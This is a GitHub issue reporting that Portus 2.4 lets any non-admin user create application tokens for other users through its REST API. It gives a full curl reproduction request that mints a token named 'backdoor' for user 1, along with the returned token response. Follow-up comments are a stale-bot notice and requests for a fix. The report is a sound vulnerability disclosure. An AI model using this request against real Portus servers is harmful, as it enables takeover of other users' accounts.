Skip to content
This repository has been archived by the owner on Apr 17, 2023. It is now read-only.

Users can create application tokens for any user via the REST API #2319

Open
claudiocabral opened this issue Aug 5, 2020 · 3 comments
Open

Users can create application tokens for any user via the REST API #2319

claudiocabral opened this issue Aug 5, 2020 · 3 comments

Comments

@claudiocabral
Copy link

Description

It seems to me that any user can add application tokens to other users via the REST API.

Steps to reproduce

  1. Create a new user (can be a bot) without admin privileges, teams or namespaces
  2. Do a post request to create a new token for an arbitrary user
curl -X POST --header 'Accept: application/json' --header 'Content-Type: application/json' --header 'Portus-Auth: sneakyuser:app_token' --data '{"application":"backdoor"}'  'https://portus.mydomain.com/api/v1/users/1/application_tokens'
  1. Get an application token for user 1
{"id":10,"application":"backdoor","plain_token":"a_valid_portus_token"}
  • Expected behavior: Users cannot create tokens for other users
  • Actual behavior: Users can create tokens for other users

Portus version: opensuse/portus:2.4
@stale
Copy link

stale bot commented Dec 25, 2020

Thanks for all your contributions!
This issue has been automatically marked as stale because it has not had recent activity. It will be closed if no further activity occurs.

@stale stale bot added the stale label Dec 25, 2020
@prionkor
Copy link

prionkor commented Jan 7, 2021

This is a serious security issue any update on this?

@stale stale bot removed the stale label Jan 7, 2021
@s00500
Copy link

s00500 commented Nov 22, 2021

?

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@prionkor @s00500 @claudiocabral